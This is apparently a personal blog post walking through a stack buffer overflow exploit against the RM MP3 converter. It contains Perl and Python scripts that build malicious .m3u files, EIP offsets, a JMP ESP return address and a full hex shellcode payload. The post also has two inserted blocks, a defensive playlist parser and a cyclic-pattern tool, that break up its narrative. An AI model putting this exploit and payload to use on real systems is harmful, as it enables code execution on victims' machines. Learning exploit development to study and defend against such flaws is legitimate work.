Sunday, 12 February 2012

Buffer overflow in RM MP3

Now I am learning buffer overflows again; this time I am building an overflow for RM MP3. To make the buffer, I create the file with a Perl script:

my $file= "crash2.m3u";
my $junk= "\x41" x 30000;   # I change this count to find out how many characters are needed to overflow the buffer
open($FILE,">$file");
print $FILE "$junk";
close($FILE);
print "m3u File Created successfully\n";

Now I run this script to create crash2.m3u; the next step is to open the crash file in the MP3 converter.
When I open it in the RM MP3 application, nothing crashes. I failed, but no problem: I try making the file with another script, which I adapted from an exploit-db script:

my $Header = "#EXTM3U\n";

my $ex="http://"."A" x 26121;

open(MYFILE,'>>asu.m3u');

print MYFILE $Header.$ex;

close(MYFILE);


Then I run this Perl script and open the file in RM MP3, and ta-da, boom, it crashes. I don't know what went wrong with my earlier script, and I must find out. RM MP3 crashes with buffers of 20000 and 30000.
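The difference between the file that did nothing and the file that crashed is only the "#EXTM3U" header and the "http://" prefix, which is what you would expect when a player only copies entries it recognises as playlist lines, and copies them without checking their length. As an added example (not code from the post or from RM MP3), here is the defensive counterpart: an .m3u reader that bounds every entry on the raw bytes before it is decoded or stored, so an over-long line is treated as malformed input rather than trusted. The limits MAX_ENTRY_LEN and MAX_ENTRIES are assumptions chosen for this example, and the sample playlists are constructed.

```python
# Added example (not from the original post): a defensive .m3u reader that
# bounds every entry before it is copied or stored anywhere. The crashing file
# in the post had the shape "#EXTM3U\n" + "http://" + "A" * N, so the reader
# treats over-long entries as malformed input instead of trusting line length.
from dataclasses import dataclass, field
from typing import List

# Assumed limits, chosen for this example (not taken from the post or from
# RM MP3): no real playlist entry should approach either of them.
MAX_ENTRY_LEN = 2048
MAX_ENTRIES = 10000


@dataclass
class Playlist:
    entries: List[str] = field(default_factory=list)
    rejected: List[str] = field(default_factory=list)  # human-readable reasons


def parse_m3u(data: bytes, max_entry_len: int = MAX_ENTRY_LEN,
              max_entries: int = MAX_ENTRIES) -> Playlist:
    """Parse an .m3u body into a Playlist, refusing oversized or excess entries.

    Handles plain and extended (#EXTM3U) playlists: lines starting with '#'
    are directives or comments and are skipped, blank lines are ignored.
    """
    pl = Playlist()
    for lineno, raw in enumerate(data.splitlines(), start=1):
        # Check the length on the raw bytes, before decoding or copying, so a
        # multi-kilobyte line never reaches a fixed-size destination.
        if len(raw) > max_entry_len:
            pl.rejected.append(
                f"line {lineno}: entry of {len(raw)} bytes exceeds {max_entry_len}")
            continue
        line = raw.strip()
        if not line or line.startswith(b"#"):
            continue
        if len(pl.entries) >= max_entries:
            pl.rejected.append(f"line {lineno}: more than {max_entries} entries")
            break
        try:
            entry = line.decode("utf-8")
        except UnicodeDecodeError:
            pl.rejected.append(f"line {lineno}: not valid UTF-8")
            continue
        pl.entries.append(entry)
    return pl


# Constructed sample input: a benign playlist, then the shape of the crashing
# file from the post (header, "http://", then a long run of 'A').
BENIGN = (b"#EXTM3U\n#EXTINF:123,Some Title\n"
          b"http://example.invalid/track.mp3\nlocal.mp3\n")
HOSTILE = b"#EXTM3U\n" + b"http://" + b"A" * 26121 + b"\n"


def demo():
    """Parse both constructed playlists and return the two results."""
    return parse_m3u(BENIGN), parse_m3u(HOSTILE)


if __name__ == "__main__":
    ok, bad = demo()
    print("benign entries:", ok.entries)
    print("hostile entries:", bad.entries, "rejected:", bad.rejected)
```

The point of checking `len(raw)` first is that the decision is made on the untrusted data as it arrived, not after it has already been copied into a buffer sized for "normal" URLs.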
Now I replace the A characters with a pattern generated by pattern_create and try again to see what happens next.

I feel something is wrong there, but I will try again, so keep moving on.
Now, to create the exploit, I must know where the overwrite lands:
reaching EIP needs 17417 bytes of data, and reaching the stack needs 17425.
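Figures like 17417 come out of the cyclic pattern used above: every 4-byte window of the pattern is unique, so whatever value ends up in a register maps back to exactly one offset in the file. As an added example (not code from the post, and not the Metasploit tools themselves), here is a Python reimplementation of what pattern_create and pattern_offset do, including the little-endian detail that trips people up when they read EIP as an integer out of the debugger. The sample offset used in the demo is constructed; the post does not show the actual register value.

```python
# Added example (not from the original post): a Python reimplementation of the
# Aa0Aa1...Zz9 cyclic pattern used by Metasploit's pattern_create and of the
# offset lookup done by pattern_offset, for understanding how crash offsets
# such as the post's 17417 are derived during crash triage.
import itertools
import string
from typing import Optional, Union


def pattern_create(length: int) -> bytes:
    """Return `length` bytes of the cyclic pattern Aa0Aa1Aa2...Zz9.

    The pattern is a sequence of 3-byte triples (upper, lower, digit) in
    lexicographic order. There are 26*26*10 = 6760 distinct triples, so every
    4-byte window is unique within the first 20280 bytes; beyond that the
    pattern repeats and an offset lookup becomes ambiguous.
    """
    triples = (f"{u}{l}{d}".encode()
               for u in string.ascii_uppercase
               for l in string.ascii_lowercase
               for d in string.digits)
    needed = (length + 2) // 3  # number of whole triples that cover `length`
    out = b"".join(itertools.islice(itertools.cycle(triples), needed))
    return out[:length]


def pattern_offset(pattern: bytes, value: Union[int, bytes],
                   little_endian: bool = True) -> Optional[int]:
    """Return the offset of a 4-byte register value inside `pattern`.

    `value` may be the raw bytes as they sit in memory, or the integer the
    debugger prints for the register (e.g. 0x41306141). x86 is little-endian,
    so an integer must be turned back into memory order before searching.
    Returns None if the value does not occur in the pattern.
    """
    if isinstance(value, int):
        needle = value.to_bytes(4, "little" if little_endian else "big")
    else:
        needle = bytes(value)
    idx = pattern.find(needle)
    return None if idx < 0 else idx


def demo(offset: int = 17417) -> int:
    """Simulate a crash: take the 4 bytes that would land at `offset`, present
    them as a little-endian register value, and recover the offset again.
    `offset` is constructed for the demo, not read from the post's debugger.
    """
    pattern = pattern_create(20280)
    register = int.from_bytes(pattern[offset:offset + 4], "little")
    recovered = pattern_offset(pattern, register)
    assert recovered == offset
    return recovered


if __name__ == "__main__":
    print("pattern starts:", pattern_create(12))
    print("recovered offset:", demo())
```

If the recovered offset is None while the pattern was clearly sent, the usual cause is the wrong byte order: try the same integer with `little_endian=False`, or pass the bytes exactly as shown in the memory dump.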
Now I will write DADADADA into EIP, so I write this script:

my $Header = "#EXTM3U\n";
my $ex="http://"."\x90" x 17417;
my $ex1="\xDA\xDA\xDA\xDA";
open (MYFILE,'>>b.m3u');

print MYFILE $Header.$ex.$ex1;

close(MYFILE);
Yeaaa, EIP is overwritten with DADADADA, so I control EIP.
But I don't know how to compute the length in Perl, haha, so I skip that step. To check that I really have EIP, I write a JMP ESP address into EIP.

Now I write the code again to exploit it on Windows. Oh no, I did something wrong: my payload doesn't work. I have a problem with the payload again:

file="fuck3.m3u"
junk="http://"+"\x90"* 17417
junk+="x\D7\x30\x9D\x7C"
junk+="\x90" * 32
junk+=("\x2b\xc9\xbe\x60\xbb\x9e\xe2\xda\xdf\xd9\x74\x24\xf4\x58\xb1\x51"
"\x83\xc0\x04\x31\x70\x0c\x03\x10\xb7\x7c\x17\x2c\xad\x6b\x95\x24"
"\xcb\x93\xd9\x4b\x4c\xe7\x4a\x97\xa9\x7c\xd7\xeb\x3a\xfe\xdd\x6b"
"\x3c\x10\x56\xc4\x26\x65\x36\xfa\x57\x92\x80\x71\x63\xef\x12\x6b"
"\xbd\x2f\x8d\xdf\x3a\x6f\xda\x18\x82\xba\x2e\x27\xc6\xd0\xc5\x1c"
"\x92\x02\x0e\x17\xff\xc0\x11\xf3\xfe\x3d\xcb\x70\x0c\x89\x9f\xd9"
"\x11\x0c\x4b\xe6\x05\x85\x02\x84\x71\x85\x75\x97\x4b\x6e\x11\x9c"
"\xef\xa0\x51\xe2\xe3\x4b\x15\xfe\x56\xc0\x96\xf6\xf6\xbf\x98\x48"
"\x09\xac\xf5\xab\xc3\x4a\xa5\x35\x84\xa1\x7b\xd1\x23\xb5\x49\x7e"
"\x98\xc6\x7e\xe8\xeb\xd4\x83\xd3\xbb\xd9\xaa\x7c\xb5\xc3\x35\x03"
"\x28\x03\xb8\x56\xd9\x16\x43\x88\x75\xce\xb2\xdd\x2b\xa7\x3b\xcb"
"\x67\x1b\x97\xa0\xd4\xd8\x44\x05\x88\x21\xba\xef\x46\xcf\x67\x89"
"\xc5\x66\x76\xc0\x82\xdc\x63\x9a\x95\x4a\x6b\x8c\x70\x65\xc2\x65"
"\x7a\x55\x8c\x21\x29\x78\xa4\x7e\xcd\x53\x65\xd5\xce\x8c\xe2\x30"
"\x79\xab\xba\xed\x85\x65\x6c\x45\x2e\xdf\x72\xb5\x5d\xb7\x6b\x4c"
"\xa4\x31\x23\x51\xfe\x97\x34\x7d\x99\x7d\xaf\x1b\x0e\xe1\x42\x6a"
"\x2b\x8f\xcc\x35\x9d\x9c\x64\x22\xb7\x58\xfe\x4e\x79\xa1\xf3\x24"
"\x84\x63\xd9\xc6\x3b\x48\xb2\xbb\xc6\xa8\x1f\x68\x9d\xa1\x2d\x90"
"\x51\x27\x2d\x19\xd2\xb7\x07\xba\x8d\x15\xf9\x6d\x63\xf0\xf8\xdc"
"\xd2\x51\xaa\x21\x04\x31\xe1\x04\xa0\x0c\xaa\x49\x7d\xfa\xb2\x4a"
"\xb5\x04\x9c\x3f\xed\x06\x9e\xfb\x76\x08\x77\x51\x88\x26\x10\xa5"
"\xfc\xc3\xbe\x16\xfe\x1a\xbf\x48")
file=open(file,'w')
file.write(junk)
print("success")
file.close()
